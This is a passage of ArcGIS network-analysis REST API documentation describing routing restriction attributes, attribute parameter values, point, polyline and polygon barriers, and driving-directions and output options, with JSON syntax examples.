parameter value should be specified as a comma-separated list of names. The parameter values are the same as the impedanceAttributeName parameter. For example, accumulateAttributeNames=Miles,Kilometers indicates that the total cost of the route should also be calculated in miles and kilometers. This is also the default value for this parameter. Note: The values specified for the accumulateAttributeNames parameter are purely for reference. The service always uses impedanceAttributeName to find the best routes. restrictionAttributeNames Use this parameter to specify which restrictions should be honored by the service. A restriction represents a driving preference or requirement. In most cases, restrictions cause roads or pathways to be prohibited, but they can also cause them to be avoided or preferred. For instance, using an Avoid Toll Roads restriction will result in a route that will include toll roads only when it is absolutely required to travel on toll roads in order to visit a stop. Height Restriction makes it possible to route around any clearances that are lower than the height of your vehicle. If you are carrying corrosive materials on your vehicle, using the Any Hazmat Prohibited restriction prevents hauling the materials along roads where it is marked as illegal to do so. Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode. The parameter value is specified as a comma-separated list of restriction names. For example, the default value for this parameter is restrictionAttributeNames=Avoid Carpool Roads, Avoid Express Lanes, Avoid Gates, Avoid Private Roads, Avoid Unpaved Roads, Driving an Automobile, Roads Under Construction Prohibited, Through Traffic Prohibited. A value of none indicates that no restrictions should be used when finding shortest paths. The service supports the restriction names listed in the following table: Note: Some restrictions are supported only in certain countries as indicated by the Availability column in the table. A restriction is supported in a country if the Logistics Attribute column has a value of Yes in the list of supported countries. If you specify restriction names that are not available in the country where your input points are located, the service ignores the invalid restrictions and returns warning messages indicating the names for the restrictions that were not considered when making measurements. Note: Sometimes you need to specify an additional value, the restriction attribute parameter, on a restriction to get the intended results. This value needs to be associated with the restriction name and a restriction parameter using attributeParameterValues. Restriction NameDescriptionAvailability Any Hazmat Prohibited The route will not include roads where transporting any kind of hazardous material is prohibited. Select countries in North America and Europe Avoid Carpool Roads The route will avoid roads that are designated exclusively for carpool (high-occupancy) vehicles. All countries Avoid Express Lanes The route will avoid roads designated as express lanes. All countries Avoid Ferries The route will avoid ferries. All countries Avoid Gates The route will avoid roads where there are gates such as keyed access or guard controlled entryways. All countries Avoid Limited Access Roads The route will avoid roads that are limited access highways. All countries Avoid Private Roads The route will avoid roads that are not publicly owned and maintained. All countries Avoid Toll Roads The route will avoid toll roads. All countries Avoid Truck Restricted Roads The route will avoid roads where trucks are not allowed except when making deliveries. All countries Avoid Unpaved Roads The route will avoid roads that are not paved (for example, dirt, gravel, etc.). All countries Axle Count Restriction The route will not include roads where trucks with the specified number of axles are prohibited. The number of axles can be specified using the Number of Axles restriction parameter. Select countries in North America and Europe Driving a Bus The route will not include roads where buses are prohibited. Using this restriction will also ensure that the route will honor one-way streets. All countries Driving a Delivery Vehicle The route will not include roads where delivery vehicle are prohibited. Using this restriction will also ensure that the route will honor one-way streets. All countries Driving a Taxi The route will not include roads where taxis are prohibited. Using this restriction will also ensure that the route will honor one-way streets. All countries Driving a Truck The route will not include roads where trucks are prohibited. Using this restriction will also ensure that the route will honor one-way streets. All countries Driving an Automobile The route will not include roads where automobiles are prohibited. Using this restriction will also ensure that the route will honor one-way streets. All countries Driving an Emergency Vehicle The route will not include roads where emergency vehicles are prohibited. Using this restriction will also ensure that the route will honor one-way streets. All countries Height Restriction The route will not include roads where the vehicle height exceeds the maximum allowed height for the road. The vehicle height can be specified using the Vehicle Height (meters) restriction parameter. Select countries in North America and Europe Kingpin to Rear Axle Length Restriction The route will not include roads where the vehicle length exceeds the maximum allowed kingpin to rear axle for all trucks on the road. The length between the vehicle kingpin and the rear axle can be specified using the Vehicle Kingpin to Rear Axle Length (meters) restriction parameter. Select countries in North America and Europe Length Restriction The route will not include roads where the vehicle length exceeds the maximum allowed length for the road. The vehicle length can be specified using the Vehicle Length (meters) restriction parameter. Select countries in North America and Europe Preferred for Pedestrians The route prefers paths designated for pedestrians. All countries Riding a Motorcycle The route will not include roads where motorcycles are prohibited. Using this restriction will also ensure that the route will honor one-way streets. All countries Roads Under Construction Prohibited The route will not include roads that are under construction. All countries Semi or Tractor with One or More Trailers Prohibited The route will not include roads where semis or tractors with one or more trailers are prohibited. Select countries in North America and Europe Single Axle Vehicles Prohibited The route will not include roads where vehicles with single axles are prohibited. Select countries in North America and Europe Tandem Axle Vehicles Prohibited The route will not include roads where vehicles with tandem axles are prohibited. Select countries in North America and Europe Through Traffic Prohibited The route will not include roads where through traffic (non-local) is prohibited. All countries Truck with Trailers Restriction The route will not include roads where trucks with the specified number of trailers on the truck are prohibited. The number of trailers on the truck can be specified using the Number of Trailers on Truck restriction parameter. Select countries in North America and Europe Use Preferred Hazmat Routes The route will prefer roads that are designated for transporting any kind of hazardous materials. Select countries in North America and Europe Use Preferred Truck Routes The route will prefer roads that are designated as trucks routes such as the roads that are part of the national network as specified by the National Surface Transportation Assistance Act in the United States, or roads that are designated as truck routes by the state or province, or roads that are preferred by the trucks when driving in an area. Select countries in North America and Europe Walking The route will not include roads where pedestrians are prohibited. All countries Weight Restriction The route will not include roads where the vehicle weight exceeds the maximum allowed weight for the road. The vehicle weight can be specified using the Vehicle Weight (kilograms) restriction parameter. Select countries in North America and Europe Weight per Axle Restriction The route will not include roads where the vehicle weight per axle exceeds the maximum allowed weight per axle for the road. The vehicle weight per axle can be specified using the Vehicle Weight per Axle (kilograms) restriction parameter. Select countries in North America and Europe Width Restriction The route will not include roads where the vehicle width exceeds the maximum allowed width for the road. The vehicle width can be specified using the Vehicle Width(meters) restriction parameter. Select countries in North America and Europe Legacy: Driving a Delivery Vehicle restriction attribute is deprecated and will be unavailable in future releases. To achieve similar results, use Driving a Truck restriction attribute along with Avoid Truck Restricted Roads restriction attribute. Example: restrictionAttributeNames=Driving an Emergency Vehicle,Height Restriction,Length Restriction attributeParameterValues Use this parameter to specify additional values required by an attribute or restriction, such as to specify whether the restriction prohibits, avoids, or prefers travel on restricted roads. If the restriction is meant to avoid or prefer roads, you can further specify the degree to which they are avoided or preferred using this parameter. Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode. The parameter value is specified as an array of objects each having the following properties: • attributeName— The name of the restriction • parameterName—The name of the parameter associated with the restriction. A restriction can have one or more parameterName properties. • value—The value for parameterName. Most attribute parameters are related to the restriction attributes in restrictionAttributeNames. Each restriction has at least one attribute parameter named Restriction Usage, which specifies whether the restriction prohibits, avoids, or prefers travel on the roads associated with the restriction and the degree to which the roads are avoided or preferred. The Restriction Usage parameter can be assigned any of the following string values, or their equivalent numeric values listed within the parentheses: • Prohibited (-1)—Travel on the roads that have the restriction is completely prohibited. • Avoid_High (5)—It is very unlikely for the service to include in the route the roads that are associated with the restriction. • Avoid_Medium (2)—It is unlikely for the service to include in the route the roads that are associated with the restriction. • Avoid_Low (1.3)—It is somewhat unlikely for the service to include in the route the roads that are associated with the restriction. • Prefer_Low (0.8)—It is somewhat likely for the service to include in the route the roads that are associated with the restriction. • Prefer_Medium(0.5)—It is likely for the service to include in the route the roads that are associated with the restriction. • Prefer_High (0.2)—It is very likely for the service to include in the route the roads that are associated with the restriction. Note: The restrictionAttributeNames parameter is associated with attributeParameterValues. The restriction attribute's parameter value is specified as part of attributeParameterValues. Each restriction has at least one parameter named Restriction Usage, which specifies whether travel on roads that have the restriction is prohibitied, should be avoided, or should be preferred. For the latter two options, it also specifies the degree to which the roads are avoided or preferred. In most cases, you can use the default value, Prohibit, for the Restriction Usage if the restriction is dependent on a physical vehicle-characteristic such as vehicle height. However, in some cases, the value for Restriction Usage depends on your routing preferences. For example, the Avoid Toll Roads restriction has the default value of Avoid_Medium for the Restriction Usage parameter. This means that when the restriction is used, the service will try to route around toll roads when it can. Avoid_Medium also indicates how important it is to avoid toll roads when finding the best route; it has a medium priority. Choosing Avoid_Low would put lower importance on avoiding tolls; choosing Avoid_High instead would give it a higher importance and thus make it more acceptable for the service to generate longer routes to avoid tolls. Choosing Prohibited would entirely disallow travel on toll roads, making it impossible for a route to travel on any portion of a toll road. Keep in mind that avoiding or prohibiting toll roads, and thus avoiding toll payments, is the objective for some; in contrast, others prefer to drive on toll roads because avoiding traffic is more valuable to them than the money spent on tolls. In the latter case, you would choose Prefer_Low, Prefer_Medium, or Prefer_High as the value for Restriction Usage. The higher the preference, the farther the service will go out of its way to travel on the roads associated with the restriction. The following table lists the attribute parameter names and the default parameter values. Tip: If you wish to use the default value for a restriction parameter, the restriction name, restriction parameter name, and restriction parameter value do not have to be specified as part of the attributeParameterValues. Restriction NameRestriction Parameter NameRestriction Parameter Default Value Any Hazmat Prohibited Restriction Usage Prohibited Avoid Carpool Roads Restriction Usage Avoid_High Avoid Express Lanes Restriction Usage Avoid_High Avoid Ferries Restriction Usage Avoid_Medium Avoid Gates Restriction Usage Avoid_Medium Avoid Limited Access Roads Restriction Usage Avoid_Medium Avoid Private Roads Restriction Usage Avoid_Medium Avoid Toll Roads Restriction Usage Avoid_Medium Avoid Truck Restricted Roads Restriction Usage Avoid High Axle Count Restriction Number of Axles 0 Restriction Usage Prohibited Driving a Bus Restriction Usage Prohibited Driving a Delivery Vehicle Restriction Usage Prohibited Driving a Taxi Restriction Usage Prohibited Driving a Truck Restriction Usage Prohibited Driving an Automobile Restriction Usage Prohibited Driving an Emergency Vehicle Restriction Usage Prohibited Height Restriction Restriction Usage Prohibited Vehicle Height (meters) 0 Kingpin to Rear Axle Length Restriction Restriction Usage Prohibited Vehicle Kingpin to Rear Axle Length (meters) 0 Length Restriction Restriction Usage Prohibited Vehicle Length (meters) 0 Riding a Motorcycle Restriction Usage Prohibited Roads Under Construction Prohibited Restriction Usage Prohibited Semi or Tractor with One or More Trailers Prohibited Restriction Usage Prohibited Single Axle Vehicles Prohibited Restriction Usage Prohibited Tandem Axle Vehicles Prohibited Restriction Usage Prohibited Through Traffic Prohibited Restriction Usage Avoid_High Truck with Trailers Restriction Restriction Usage Prohibited Number of Trailers on Truck 0 Use Preferred Hazmat Routes Restriction Usage Prefer_Medium Use Preferred Truck Routes Restriction Usage Prefer_Medium Walking Restriction Usage Prohibited WalkTime Walking Speed (km/h) 5 Weight Restriction Restriction Usage Prohibited Vehicle Weight (kilograms) 0 Weight per Axle Restriction Restriction Usage Prohibited Vehicle Weight per Axle (kilograms) 0 Width Restriction Restriction Usage Prohibited Vehicle Width (meters) 0 Syntax for specifying attributeParameterValues [ { "attributeName": "<attribute1>", "parameterName": "<parameter1>", "value": "<value1>" }, { "attributeName": "<attribute2>", "parameterName": "<parameter2>", "value": "<value2>" } ] Example: Specifying the vehicle height and weight and a high preference to use designated truck routes This example shows how to specify the height and weight of the vehicle for use with the height and weight restrictions respectively along with a high preference to include the designated truck routes. This results in a route that does not include any roads where the clearance under overpasses or through tunnels is less than the vehicle height. The route will also not include any roads with load limited bridges or local roads that prohibit heavy vehicles if the vehicle weight exceeds the maximum permissible weight. However, the route will include as many roads as possible that are designated as preferred truck routes. Note that the Restriction Usage parameter for the Height Restriction and the Weight Restriction are not specified as we want to use the default value of Prohibit for these restriction parameters. attributeParameterValues= [ { "attributeName": "Height Restriction", "parameterName": "Vehicle Height (meters)", "value": 4.12 }, { "attributeName": "Weight Restriction", "parameterName": "Vehicle Weight (kilograms)", "value": 36287 }, { "attributeName": "Use Preferred Truck Routes", "parameterName": "Restriction Usage", "value": "Prefer_High" } ] barriers Use this parameter to specify one or more points that act as temporary restrictions or represent additional time or distance that may be required to travel on the underlying streets. For example, a point barrier can be used to represent a fallen tree along a street or time delay spent at a railroad crossing. Caution: The service imposes a maximum limit of 250 point barriers. If the value is exceeded, the response returns an error message. The barriers parameter can be specified using a simple comma- and semicolon-based syntax if you need to specify only point barrier geometries as longitude and latitude values in the default spatial reference (WGS84). Simple syntax for barriers barriers=x1,y1; x2, y2; ...; xn, yn Example using simple syntax barriers=-117.1957,34.0564; -117.184,34.0546 You can specify barrier geometries as well as attributes using a more comprehensive JSON structure that represents a set of features. The JSON structure can include the following properties: • features: Specify an array of features. This property is optional. However, either the features or the url property must be specified. • url: Specify a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set. This property is optional. However either the features or the url property must be specified. Each feature in this array represents a point barrier and contains the following fields: • geometry: Specifies the barrier geometry as a point containing x and y properties along with a spatialReference property. The spatialReference property is not required if the coordinate values are in the default spatial reference WGS84. If the coordinate values are in a different spatial reference, you need to specify the well-known ID (WKID) for the spatial reference. You can find the WKID for your spatial reference depending on whether the coordinates are represented in a geographic coordinate system or a projected coordinate system. • attributes: Specify each attribute as a key-value pair where the key is the name of a given field, and the value is the attribute value for the corresponding field. Attributes for barriers When specifying the barriers parameter using JSON structure, you can specify additional information about barriers, such as the barrier type, using attributes. The barriers parameter can be specified with the following attributes: • Name: The name of the barrier. • BarrierType: Specifies whether the point barrier restricts travel completely or adds time or distance when it is crossed. The value for this attribute is specified as one of the following integers. • 0 - Prohibits traversing through the barrier. The barrier is referred to as restriction point barrier since it acts as a restriction. This is the default value. Two maps demonstrate how a restriction point barrier affects a route analysis. The map on the left shows the shortest path between two stops without any restriction point barriers. The map on the right has a road that is blocked by a fallen tree, so the shortest path between the same points is longer. • 2 - Traveling through the barrier increases the travel time or distance by the amount specified as the value for Attr_TravelTime, Attr_Miles, or Attr_Kilometers attributes. This barrier type is referred to as an added cost point barrier. Two maps demonstrate how added cost barriers affect a route analysis. The map on the left shows the shortest path between two stops without any added cost point barrier. For the map on the right, the travel time from stop one to stop two would be the same whether going around the north end of the block or the south end; however, since crossing railroad tracks incurs a time penalty (modeled with added cost point barriers), the route with only one railroad crossing is chosen. The cost of crossing the barrier is added to the accumulated travel time of the resulting route. Note: There is no point barrier type with a value of 1 for the BarrierType attribute. • FullEdge: This attribute is applicable only for restriction point barriers. The value for this attribute is specified as one of the following integers. • 0 - Permits travel on the edge up to the barrier, but not through it. This is the default value. • 1 - Restricts travel anywhere on the underlying street. • Attr_TravelTime: Indicates how much travel time in minutes is added when the barrier is traversed. This attribute is applicable only for added-cost barriers. The attribute value must be greater than or equal to zero. • Attr_Miles: Indicates how much distance in miles is added when the barrier is traversed. This attribute is applicable only for added-cost barriers. The attribute value must be greater than or equal to zero. • Attr_Kilometers: Indicates how much distance in kilometers is added when the barrier is traversed. This attribute is applicable only for added-cost barriers. The attribute value must be greater than or equal to zero. Syntax for specifying barriers using JSON structure for features { "features": [ { "geometry": { "x": <x>, "y": <y>, "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid>, } }, "attributes": { "<field1>": <value11>, "<field2>": <value12> } }, { "geometry": { "x": <x>, "y": <y>, "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid>, } }, "attributes": { "<field1>": <value21>, "<field2>": <value22> } } ], } Example 1: Specifying added cost point barrier using JSON structure. This example shows how to use an added cost point barrier to model a 5 minute delay at a rail road crossing. The BarrierType attribute is used to specify that the point barrier is of type added cost and the Attr_TravelTime attribute is used to specify the delay in minutes. The barrier geometry is in the default spatial reference, WGS84, and hence the spatialReference property is not required within the geometry property. { "features": [ { "geometry": { "x": 37.541479, "y": -122.053461 }, "attributes": { "Name": "Haley St rail road crossing", "BarrrierType": 2, "Attr_TravelTime": 5 } } ] } Syntax for specifying barriers using URL to a JSON response { "url": "<url>" } Example 2: Specifying restriction point barrier using URL. The URL makes a query for a few features from a map service. A URL querying features from a feature service can also be specified. { "url": "http://sampleserver3.arcgisonline.com/ArcGIS/rest/services/Network/USA/MapServer/0/query?where=1%3D1&returnGeometry=true&f=json" } polylineBarriers Use this parameter to specify one or more lines that prohibit travel anywhere the lines intersect the streets. For example, a parade or protest that blocks traffic across several street segments can be modeled with a line barrier. A line barrier can also quickly fence off several roads from being traversed, thereby channeling possible routes away from undesirable parts of the street network. Two maps demonstrate how a line barrier affects finding a route between two stops. The map on the left displays the shortest path between two stops. The map on the right shows the shortest path when several streets are blocked by a polyline barrier. Caution: The service imposes a limit on the number of streets you can restrict using polylineBarriers parameter. While there is no limit on number of lines you can specify as polyline barriers, the combined number of streets intersected by all the lines should not exceed 500. If the value is exceeded, the response returns an error message. You can specify polyline barrier geometries as well as attributes using a JSON structure that represents a set of features. The JSON structure can include the following properties: • features: Specify an array of features. This property is optional. However, either the features or the url property must be specified. • url: Specify a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set. This property is optional. However either the features or the url property must be specified. Each feature in this array represents a polyline barrier and contains the following fields: • geometry: Specifies the barrier geometry. The structure is based on ArcGIS REST polyline object. A polyline contains an array of paths and a spatialReference. Each path is represented as an array of points, and each point in the path is represented as an array of numbers containing X and Y coordinate values at index 0 and 1 respectively. The spatialReference property is not required if the coordinate values are in the default spatial reference WGS84. If the coordinate values are in a different spatial reference, you need to specify the well-known ID (WKID) for the spatial reference. You can find the WKID for your spatial reference depending on whether the coordinates are represented in a geographic coordinate system or a projected coordinate system. • attributes: Specify each attribute as a key-value pair where the key is the name of a given field, and the value is the attribute value for the corresponding field. Attributes for polylineBarriers When specifying the polylineBarriers parameter using JSON structure, the parameter can be specified with the following attributes: • Name: The name of the polyline barrier. Syntax for specifying polyline barriers using JSON structure for features { "features": [ { "geometry": { "paths": [ [ [ <x11>, <y11> ], [ <x12>, <y12> ] ], [ [ <x21>, <y21> ], [ <x22>, <y22> ] ] ], "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid> } }, "attributes": { "<field1>": <value11>, "<field2>": <value12> } }, { "geometry": { "paths": [ [ [ <x11>, <y11> ], [ <x12>, <y12> ] ], [ [ <x21>, <y21> ], [ <x22>, <y22> ] ] ], "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid> } }, "attributes": { "<field1>": <value21>, "<field2>": <value22> } } ] } Example 1: Specifying polyline barriers using JSON structure. The example shows how to add two lines as polyline barriers to restrict travel on the streets intersected by the lines. Barrier 1 is a single-part line feature made up of two points. Barrier 2 is a two-part line feature. The first part is made up of three points, and the second part is made up of two points. The barrier geometries are in the Web Mercator spatial reference and not in the default WGS84 spatial reference. Hence, the spatialReference property is required within the geometry property. { "features": [ { "geometry": { "paths": [ [ [ -10804823.397, 3873688.372 ], [ -10804811.152, 3873025.945 ] ] ], "spatialReference": { "wkid": 102100 } }, "attributes": { "Name": "Barrier 1" } }, { "geometry": { "paths": [ [ [ -10804823.397, 3873688.372 ], [ -10804807.813, 3873290.911 ], [ -10804811.152, 3873025.945 ] ], [ [ -10805032.678, 3863358.76 ], [ -10805001.508, 3862829.281 ] ] ], "spatialReference": { "wkid": 102100 } }, "attributes": { "Name": "Barrier 2" } } ] } Syntax for specifying polyline barriers using URL returning a JSON response { "url": "<url>" } Example 2: Specifying polyline barrier using URL. The URL makes a query for a few features from a map service. A URL querying features from a feature service can also be specified. { "url": "http://sampleserver3.arcgisonline.com/ArcGIS/rest/services/Network/USA/MapServer/6/query?where=1%3D1&returnGeometry=true&f=json" } polygonBarriers Use this parameter to specify polygons that either completely restrict travel or proportionately scale the time or distance required to travel on the streets intersected by the polygons. Caution: The service imposes a limit on the number of streets you can restrict using the polygonBarriers parameter. While there is no limit on number of polygons you can specify as the polygon barriers, the combined number of streets intersected by all the polygons should not exceed 2,000. If the value is exceeded, the response returns an error message. You can specify polygon barrier geometries as well as attributes using a JSON structure that represents a set of features. The JSON structure can include the following properties: • features: Specify an array of features. This property is optional. However, either the features or the url property must be specified. • url: Specify a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set. This property is optional. However, either the features or the url property must be specified. Each feature in this array represents a polygon barrier and contains the following fields: • geometry: Specifies the barrier geometry. The structure is based on ArcGIS REST polygon object. A polygon contains an array of rings and a spatialReference. The first point of each ring is always the same as the last point. Each point in the ring is represented as an array of numbers containing X and Y coordinate values at index 0 and 1 respectively. The spatialReference property is not required if the coordinate values are in the default spatial reference WGS84. If the coordinate values are in a different spatial reference, you need to specify the well-known ID (WKID) for the spatial reference. You can find the WKID for your spatial reference depending on whether the coordinates are represented in a geographic coordinate system or a projected coordinate system. • attributes: Specify each attribute as a key-value pair where the key is the name of a given field, and the value is the attribute value for the corresponding field. Attributes for polygonBarriers When specifying the polygonBarriers parameter using JSON structure, you can specify additional information about barriers, such as the barrier type, using attributes. The polygonBarriers parameter can be specified with the following attributes: • Name: The name of the barrier. • BarrierType: Specifies whether the barrier restricts travel completely or scales the time or distance for traveling through it. The value for this attribute is specified as one of the following integers: • 0 - Prohibits traveling through any part of the barrier. The barrier is referred to as restriction polygon barrier since it prohibits traveling on streets intersected by the barrier. One use of this type of barrier is to model floods covering areas of the street that make traveling on those streets impossible. This is the default value. Two maps demonstrate how a restriction polygon barrier affects finding a route between two stops. The left side depicts the shortest path between two stops. On the right, a polygon barrier blocks flooded streets, so the shortest path between the same two stops is different. • 1 - Scales the time or distance required to travel the underlying streets by a factor specified using the Attr_TravelTime, Attr_Miles, or Attr_Kilometers attributes. If the streets are partially covered by the barrier, the travel time or distance is apportioned and then scaled. For example, a factor 0.25 would mean that travel on underlying streets is expected to be four times faster than normal. A factor of 3.0 would mean it is expected to take three times longer than normal to travel on underlying streets. This barrier type is referred to as scaled cost polygon barrier. It might be used to model storms that reduce travel speeds in specific regions. Two maps demonstrate how a scaled cost polygon barrier affects finding a route between two stops. The map on the left shows a route that goes through inclement weather without regard for the effect poor road conditions have on travel time. On the right, a scaled polygon barrier doubles the travel time of the roads covered by the storm. Notice the route still passes through the southern tip of the storm since it is quicker to spend more time driving slowly through a small part of the storm rather than driving completely around it. The service uses the modified travel time in calculating the best route; furthermore, the modified travel time is reported as the total travel time in the response. • Attr_TravelTime: This is the factor by which the travel time of the streets intersected by the barrier is multiplied. This attribute is applicable only for scaled-cost barriers. You should specify this attribute if the impedanceAttributeName request parameter has the value TravelTime. The attribute value must be greater than zero. • Attr_Miles: This is the factor by which the distance of the streets intersected by the barrier is multiplied. This attribute is applicable only for scaled-cost barriers. You should specify a value for this attribute if the impedanceAttributeName request parameter has the value Miles. The attribute value must be greater than zero. • Attr_Kilometers: This is the factor by which the distance of the streets intersected by the barrier is multiplied. This attribute is applicable only for scaled-cost barriers. You should specify a value for this attribute if the impedanceAttributeName request parameter has the value Kilometers. The attribute value must be greater than zero. Syntax for specifying polygon barriers using JSON structure for features { "features": [ { "geometry": { "rings": [ [ [ <x11>, <y11> ], [ <x12>, <y12> ], ..., [ <x11>, <y11> ] ], [ [ <x21>, <y21> ], [ <x22>, <y22> ], ..., [ <x21>, <y21> ] ] ], "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid>, } }, "attributes": { "<field1>": <value11>, "<field2>": <value12> } }, { "geometry": { "rings": [ [ [ <x11>, <y11> ], [ <x12>, <y12> ], ..., [ <x11>, <y11> ] ], [ [ <x21>, <y21> ], [ <x22>, <y22> ], ..., [ <x21>, <y21> ] ] ], "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid>, } }, "attributes": { "<field1>": <value21>, "<field2>": <value22> } } ] } Example 1: Specifying polygon barriers using JSON structure. The example shows how to add two polygons as barriers. The first polygon named Flood zone is a restriction polygon barrier that prohibits travel on the underlying streets. The polygon is a single-part polygon feature made up of four points. The second polygon named Severe weather zone is a scaled-cost polygon barrier that reduces the travel time on underlying streets to one third of the original value. The polygon is a two-part polygon feature. Both parts are made up of four points. The barrier geometries are in the default spatial reference, WGS84. Hence, the spatialReference property is not required within geometry property. { "features": [ { "geometry": { "rings": [ [ [ -97.0634, 32.8442 ], [ -97.0554, 32.84 ], [ -97.0558, 32.8327 ], [ -97.0638, 32.83 ], [ -97.0634, 32.8442 ] ] ] }, "attributes": { "Name": "Flood zone", "BarrierType": 0 } }, { "geometry": { "rings": [ [ [ -97.0803, 32.8235 ], [ -97.0776, 32.8277 ], [ -97.074, 32.8254 ], [ -97.0767, 32.8227 ], [ -97.0803, 32.8235 ] ], [ [ -97.0871, 32.8311 ], [ -97.0831, 32.8292 ], [ -97.0853, 32.8259 ], [ -97.0892, 32.8279 ], [ -97.0871, 32.8311 ] ] ] }, "attributes": { "Name": "Severe weather zone", "BarrierType": 1, "Attr_TravelTime": 3 } } ] } Syntax for specifying polygon barriers using URL returning a JSON response { "url": "<url>" } Example 2: Specifying polygon barrier using URL. The URL makes a query for a few features from a map service. A URL querying features from a feature service can also be specified. { "url": "http://sampleserver3.arcgisonline.com/ArcGIS/rest/services/Network/USA/MapServer/7/query?where=1%3D1&returnGeometry=true&f=json" } returnDirections Specify whether the service should generate driving directions for each route. The default value is false. • true—Generate directions. The directions are configued based on the values for the directionsLanguage, directionsOutputType, directionsStyleName, and directionsLengthUnits parameters. The directions are available in the directions property of the JSON response. • false—Don't generate directions. directionsLanguage Specify the language that should be used when generating driving directions. This parameter applies only when the returnDirections parameter is set to true. The service supports generating directions in the following languages: • ar - Generate directions in Arabic • cs - Generate directions in Czech • de - Generate directions in German • el - Generate directions in Greek • en (default) - Generate directions in English • es - Generate directions in Spanish • et - Generate directions in Estonian • fr - Generate directions in French • he - Generate directions in Hebrew • it - Generate directions in Italian • ja - Generate directions in Japanese • ko - Generate directions in Korean • lt - Generate directions in Lithuanian • lv - Generate directions in Latvian • nl - Generate directions in Dutch • pl - Generate directions in Polish • pt-BR - Generate directions in Brazilian Portuguese • pt-PT - Generate directions in Portuguese (Portugal) • ru - Generate directions in Russian • sv - Generate directions in Swedish • tr - Generate directions in Turkish • zh-CN - Simplified Chinese The value for the parameter is specified using the language code. For example, directionsLanguage=zh-CN will result in driving directions to be generated in simplified Chinese. Note: If an unsupported language code is specified, the service returns the directions using the default language, English. directionsOutputType Define the content and verbosity of the driving directions. This parameter applies only when the returnDirections parameter is set to true. The parameter can be specified using the following values: • esriDOTComplete—Directions output that includes all directions properties. • esriDOTCompleteNoEvents—Directions output that includes all directions properties except events. • esriDOTInstructionsOnly—Directions output that includes text instructions, time, length and ETA. Does not include geometry. • esriDOTStandard (default)—Standard directions output direction text instructions, geometry, time, length, ETA. Does not include events, new types of strings (street names, signposts info), Maneuver type, Bearings and Turn angle. • esriDOTSummaryOnly—Directions output that contains only summary (time and length). Detailed text instructions and geometry are not provided. directionsStyleName Specify the name of the formatting style for the directions. This parameter applies only when the returnDirections parameter is set to true. The parameter can be specified using the following values: • NA Desktop (default)—Generates turn-by-turn directions suitable for printing. • NA Navigation—Generates turn-by-turn directions designed for an in-vehicle navigation device. directionsLengthUnits Specify the units for displaying travel distance in the driving directions. This parameter applies only when the returnDirections parameter is set to true. The parameter can be specified using one of the values: • esriNAUCentimeters • esriNAUDecimalDegrees • esriNAUDecimeters • esriNAUFeet • esriNAUInches • esriNAUKilometers • esriNAUMeters • esriNAUMiles (default) • esriNAUMillimeters • esriNAUNauticalMiles • esriNAUPoints • esriNAUYards directionsTimeAttributeName Set the time-based impedance attribute to display the duration of a maneuver, such as "Go northwest on Alvorado St. for 5 minutes." The units for all the time attributes is minutes. • TravelTime (default)—Travel times for a car • TruckTravelTime—Travel times for a truck • WalkTime—Travel times for a pedestrian outputLines Use this parameter to specify the type of route features that are output by the service. This parameter is applicable only if the returnCFRoutes parameter is set to true. The outputLines parameter can have one of the following values: • esriNAOutputLineTrueShape—Return the exact shape of the resulting route that is based on the underlying streets. This is the default value. • esriNAOutputLineTrueShapeWithMeasure—Return the exact shape of the resulting route that is based on the underlying streets and include route measurements that keep track of the cumulative travel time or travel distance along the route relative to the first stop. When this value is chosen for the outputLines parameter, each point that make up the route shape will include an M value along with X and Y values. The M value, also known as the measure value, indicates the accumulated travel time or travel distance at that point along the route. The M values can be used to determine how far you have traveled from the start of the route or the remaining distance or time left to reach the destination. The M values store travel time if the impedanceAttributeName is set to TravelTime and store the travel distance if the impedanceAttributeName is set to Kilometers or Miles. • esriNAOutputLineStraight—Return a straight line between the incident and the closest facility. • esriNAOutputLineNone—Do not return any shapes for the routes. This value can be useful in cases where you are only interested in determing the total travel time or travel distance of the route. For example, if your application has already calculated the route and after some time your application needs to only calculate the expected time of arrival (ETA) to the destination, you can set the returnCFRoutes parameter to true and the outputLines parameter to esriNAOutputLineNone. The routes property of the JSON response will only contain the total travel time that can be used to determine the ETA. Since the route shape is not returned when using the esriNAOutputLineNone value, the response size will be considerably smaller. Tip: When the outputLines parameter is set to esriNAOutputLineTrueShape or esriNAOutputLineTrueShapeWith Measure, the generalization of the route shape can be further controlled using the appropriate values for the outputGeometryPrecision and the outputGeometryPrecisionUnits parameters. Note: No matter which value you choose for the outputLines parameter, the best route is always determined by minimizing the travel time or the travel distance, never using the Euclidean distance (or as the crow flies distance) between the stops. This means that only the route shapes are different, not the underlying streets that are searched when finding the route. returnFacilities Use this parameter to specify if facilities will be returned by the service. The possible values for this parameter are true, or false. A true value indicates that the facilities used as input will be returned as part of the facilities property in the JSON response. The default value for this parameter is false. If you have specified the facilities parameter using a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set, returning facilities can allow you to draw the facility locations in your application. You may also want to set the returnFacilities property to true in order to determine if the facilities were successfully located on the street network or had some other errors by checking the Status property in the JSON response. returnIncidents Use this parameter to specify if incidents will be returned by the service. The possible values for this parameter are true, or false. A true value indicates that the incidents used as input will be returned as part of the facilities property in the JSON response. The default value for this parameter is false. If you have specified the incidents parameter using a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set, returning incidents can allow you to draw the incident locations in your application. You may also want to set the returnIncidents property to true in order to determine if the incidents were successfully located on the street network or had some other errors by checking the Status property in the JSON response. returnBarriers Specify whether barriers will be returned by the service. • true—The input point barriers are returned as part of the barriers property in the JSON response. • false (default)—Point barriers are not returned. Setting this parameter has no effect if you don't also specify a value for the barriers parameter. If you have specified the barriers parameter using a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set, returning barriers can allow you to draw the point barrier locations in your application. You may also want to set the returnBarriers property to true to see where the barriers were located on the street network or, if they weren't located at all, understand what the problem was by checking the Status property in the JSON response. returnPolylineBarriers Specify whether polyline barriers will be returned by the service. • true—The input polyline barriers are returned as part of the polylineBarriers property in the JSON response. • 